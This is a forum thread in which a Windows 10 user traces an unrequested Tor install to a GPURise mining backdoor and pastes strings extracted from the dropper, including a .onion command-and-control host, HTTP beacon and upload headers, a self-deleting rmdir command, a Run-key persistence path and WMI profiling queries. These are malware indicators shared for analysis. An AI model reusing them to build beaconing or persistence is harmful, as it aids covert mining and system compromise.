Why did Windows 10 automatically install the Tor browser?

[gold333]

So looking through my WIndows 10 drive, I was surprised to find:

C:\Program Files\Tor

Not installed by me. File date modified yesterday when I was surfing youtube on this machine.

What process could have possibly installed the Tor browser?

It makes no sense to me.

Can anyone smarter than me hazard a guess as to why this may have happened? And by whom?


The file attribute says 05:04AM.

At 04:46 AM my system (Windows 10, Google Chrome) froze like it never had before (this system never crashes). Only taskmanager worked, but wouldn't allow a shut down. It just kept spinning the circles. So I switched off the power supply and forced a restart.

 

[Mr.Scott]

None. Scan for malware.

 

[gold333]

Was going crazy so decided to search all system files for files created at the exact minute the datestamp is on the tor folder.

Found an empty /public/appdata/gpurise folder.


Found two links on Google for gpurise.

It's created by a malicious website that also installs gpurise.
"Apparently GPURise.exe is a virus making backdoor, put TOR in C: / Plogram Files. Since GPURise.exe makes itself effective for PC startup in the registry, it is better to delete it with anti-virus. Or delete the registry value first. TOR deletes each folder."

It's new and Win Defender doesn't catch it.

Check your systems for tor.exe and or "gpurise"

It turns your PC into a remote mining server by utilising the gpu.

Funnily enough I'm looking to buy a new gpu and I was surfing review videos of new 1080ti's (you tube and other sites which apparently cache youtube videos). You know the sites I mean, same video as the youtube vid but no comments and a different frame, etc.

Chrome didn't catch it, neither did windows def.

 

[EarthDog]

So, is gpurise on your pc??

 

[Mr.Scott]

It turns your PC into a remote mining server.

That's what I figured.

 

[gold333]

No, the folder gpurise is there in public/appdata (yes public, not the actual username. BTW the public user folder shouldn't even have an appdata folder). But it's empty. No sign of gpurise.exe or gpuriseagent.exe.

Registry currentversion/run locations also appear clean.

Weird.

The program files /tor folder is there, with all tor files and a tor.zip files with the identical folder zipped.

The tor files cannot be deleted. Taskmanager will not show the tor.exe process running. Process explorer 64 shows the process but says access to it is denied.

Had to reboot in safe mode to delete it.

Checked registry for all suspect names, turned out clean.

I'm now changing my ip address and running the malware batches.

I would have done a system restore but "awesome" Win10 apparently updated a ton of drivers and whatnot in the past three days, I didn't want to mess up the install.

Gpurise is new, the malwares don't detect it yet.

 

[Mr.Scott]

You might as well reformat that drive. There is no foolproof way to get rid of that completely and without OS damage.
Save yourself the time and aggravation.

 

[gold333]

Yep,

Reformatting now.

I thought I cleaned it. Ran mbam and ADW, both showed clean. Hell mbam is actually "realtime protecting" right now.

Opened up procesexplorer.

Came across "Object installer" running from C:\Program Files\ObjectInstallerService.

It's strings contain GPUrise.

There are 0 links on the web.

I may be the first person to have found this.



Reformatting now.

 

[Alaric]

Yet another reason to hate miners. LOL

 

[Mr.Scott]

There are 0 links on the web.

I may be the first person to have found this.

You're not the first. Here is the list of everything it changes.
https://www.bleepingcomputer.com/fo...-system-locks-up-until-i-end-gpuriseagentexe/

 

[gold333]

Yeah already saw that and it's how I learned what Gpurise was.

But I don't think theres any Google hits linking it to the object installer folder in c: like I mentioned above.

Until I deleted that the tor folder just kept coming back after each restart.

Formatted now.

 

[RollingThunder]

Yeah already saw that and it's how I learned what Gpurise was.

But I don't think theres any Google hits linking it to the object installer folder in c: like I mentioned above.

Until I deleted that the tor folder just kept coming back after each restart.

Formatted now.

Exactly what were you doing and what site were you on when this happened? None of this is clear from the above.

 

[(G{in}[AK)TION]]

Yeah already saw that and it's how I learned what Gpurise was.

But I don't think theres any Google hits linking it to the object installer folder in c: like I mentioned above.

Until I deleted that the tor folder just kept coming back after each restart.

Formatted now.

Damn that sucks. I remember going through viruses like that when i was in high school. friggin school computers infected my computers via a flash drive. That is when i brought in my own laptop that ran my own Anti-Virus tools.

 

[gold333]

Exactly what were you doing and what site were you on when this happened? None of this is clear from the above.

It was 05:30AM, hard to tell but I was looking at reviews of 1080ti video cards Galax / KFA2 EXOC 1080 white specifically. Youtube and also other obscure sites with the same videos as youtube. Video reviews are hard to find on that card specifically so I was just trawling google video hits. I believe some were in Brazillian portuguese. I ran ccleaner after the crash so lost the actual URL history. If you google EXOC 1080 white -youtube and click videos you'd probably come across it in one of the links. (-youtube hides all hits from youtube, I highly doubt the infection would have come from YT)

Then the system froze (odd seeing as it was a brand new system (Maximus X Apex, 8700K, Gskill 2x8 3200C14, WDBlack 1TBNVme) and a fresh install of win 10 64, non OC, just XMP and MCE, everything else stock) It had frozen 0 times before.

Screen and mouse cursor froze. I waited a bit, nothing.

Ctrl-Alt Delete worked. Taskmanager worked but was unclickable. Then the taskmanager window turned white and was not minimizeable or closeable. Taskbar was clickable but the start menu wouldn't come up. CTRL Alt Del kept bringing up the blue menu ok but after that you could do nothing, just click one of the 5 options or cancel. So complete system hang with only the mouse cursor moveable on that blue menu.

So Ctrl -Alt Del -> Shutdown. The circle starts spinning and never stops. Switch off PSU. Restart showed everything normal.

That's when I noticed the tor folder in program files.

Deleting that in safe mode doesn't help, just comes back. Until you also delete C:\Program Files\ObjectInstallerService.

It's weird because Chrome (latest update always) is usually great at catching this type of stuff, so is WinDef.

Heck I even uploaded the tor.exe and objectinstaller.exe to virustotal and jotti and they both showed the files were clean.

IMO this thing is really new.

To be clear, GPURISEAGENT.exe or GPURISE.EXE files were never on my system. This appears to be a mutated version of that. I only connected it to Gpurise because of the printable strings naming it in the objectinstaller service and the empty gpurise folder in public/appdata.

Thank God I installed this pc like last week so didn't lose much time on the format but others may be less lucky.

 

[gold333]

You're not the first. Here is the list of everything it changes.
https://www.bleepingcomputer.com/fo...-system-locks-up-until-i-end-gpuriseagentexe/

Yes you can see in his process dump the infection occurred exactly between 2018-03-25 13:39 and 13:40. The files created on that timestamp are the infection. Though what mayhem it does inside the registry is anyone's guess.

 

[EarthDog]

'Other obscure sites'.....

 

[Mr.Scott]

But I don't think theres any Google hits linking it to the object installer folder in c: like I mentioned above.

You need to actually read that link then, because Object Installer is right in the list.

 

[gold333]

Holy crap. Object installer came back after the format. No sign of Tor or GPUrise though.

Now I don't know if it's a normal file that should be there that was corrupted by the virus to start with or if the virus found it's way back in after the reformat.

The timestamp is the same as when I tried to install the C++ 2015 64 executable to update Win 10, but it said a newer version was already installed. I believe that's legit as Win 10 comes with C++ Redistributable 2017

I'm not deleting the file until I find out. Is this file normal and am I losing it or? Google only has 2 hits.

 

[gold333]

Found out that the timestamp is identical to when I installed Lighting_Control_1.06.29.7z the Asus ROG Aura Sync latest update to control the motherboard lights. That program tried to install the C++ distributable mentioned above which created a log file the same timestamp minute that objectinstaller.exe folder was created..

I'm still digging.

There's a slim chance that the virus was packaged in Asus's software. It may have had nothing to do with the browsing mentioned earlier.

 

[gold333]

objectinstaller.exe turns out to be a self extracting executable. Extracting the contents of the zip without running the exe lists a number of small files. One of which edited in notepad contains:

A p p D a t a G P U R i s e g p u r i s e . z i p !G P U R i s e A g e n t . e x e s e r v i c e 2 o t h e r p a y l o a d 2 . z i p s t a r t _ m i n 1\ O b j e c t I n s t a l l e r S e r v i c e \ W/ C c h o i c e / C Y / N / D Y / T 8 & r m d i r / Q / S " " c m d . e x e [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n 1 2 7 . 0 . 0 . 1 -m j o 7 m w 3 q 4 m t g s i k z . o n i o n G E T / ۇ H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

U s e r - A g e n t : g p u b o o s t 0 . 1







7\

C o n t e n t - L e n g t h : ( . * ? ) \

X 2 d e s k t o p
l a p t o p ;s e l e c t * f r o m W i n 3 2 _ P r o c e s s o r Gs e l e c t * f r o m W i n 3 2 _ V i d e o C o n t r o l l e r r o o t \ C I M V 2 iS E L E C T T o t a l P h y s i c a l M e m o r y F R O M W i n 3 2 _ C o m p u t e r S y s t e m 'T o t a l P h y s i c a l M e m o r y n a m e A d a p t e r R A M
n v i d i a a m d N u m b e r O f C o r e s SS E L E C T C a p t i o n F R O M W i n 3 2 _ O p e r a t i n g S y s t e m / u p l o a d / i n s t a l l �!P O S T / u p l o a d H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

C o n t e n t - t y p e : a p p l i c a t i o n / j s o n

C o n t e n t - L e n g t h : 7

U s e r - A g e n t : m i n e r 0 . 1



g e f o r c e
r a d e o n QB a d r e s p o n s e r e c e i v e d f r o m p r o x y s e r v e r . 1A u t h e n t i c a t i o n r e q u i r e d . CO p e r a t i o n c o m p l e t e d s u c c e s s f u l l y . ;G e n e r a l S O C K S s e r v e r f a i l u r e . EC o n n e c t i o n n o t a l l o w e d b y r u l e s e t . )N e t w o r k u n r e a c h a b l e . #H o s t u n r e a c h a b l e . 'C o n n e c t i o n r e f u s e d . T T L e x p i r e d . -C o m m a n d n o t s u p p o r t e d . 7A d d r e s s t y p e n o t s u p p o r t e d . U n k n o w n e r r o r . t o r t o r . e x e t o r . z i p MT o r h a s s u c c e s s f u l l y o p e n e d a c i r c u i t . \ T o r \ X = Y = E n t e r X O f f s e t X O f f s e t 1 'W r o n g P a r a m e t e r s . . . E n t e r Y O f f s e t Y O f f s e t %p i c t u r e L e v e l . I m a g e p i c t u r e L e v e l
p R i g h t p L e f t p S e l e c t e d l i s t m e n u m e n u S t r i p 1 +f i l e T o o l S t r i p M e n u I t e m F i l e m O p e n O p e n . . . m S a v e S a v e m S a v e A s S a v e a s . . . %t o o l S t r i p M e n u I t e m 1 m E x i t E x i t 1a c t i o n d T o o l S t r i p M e n u I t e m A c t i o n s Ao f f s e t X S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t X S e l e c t e d Ao f f s e t Y S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t Y S e l e c t e d -a b o u t T o o l S t r i p M e n u I t e m A b o u t P T o p P R e s t )M a r i o L e v e l s | * . x m l p B u t t o m
s t a t u s s t a t u s S t r i p 1
l a b e l x
l a b e l y
T a h o m a o b j e c t n a m e l a b e l $ t h i s . I c o n M a i n F o r m L e v e l E d i t o r . d l l c I n t c B o o l T r u e F a l s e
: X = , Y = . A r i a l l N a m e
l a b e l 1 c I n t 1 c I n t 2 c I n t 3
c B o o l 1
c B o o l 2
c B o o l 3
b C l o s e C l o s e b S a v e F o r m P a r a m s #O b j e c t P r o p e r t i e s / d a t a / u / I n s t a l l S e r v i c e -O b j e c t I n s t a l l e r S e r v i c e KM a r i o L e v e l E d i t o r . P r o p e r t i e s . R e s o u r c e s S e l e c t e d C a p t i o n



.onion is undeniably the Tor network.

I'm torn if this installed when the ASUS lighting software installed. It's the only logical explanation if it shows up again after a format. I'll try the ROG forums

BTW: that objectinstaller.exe file shows 0 infections on all the major online viruscheck sites.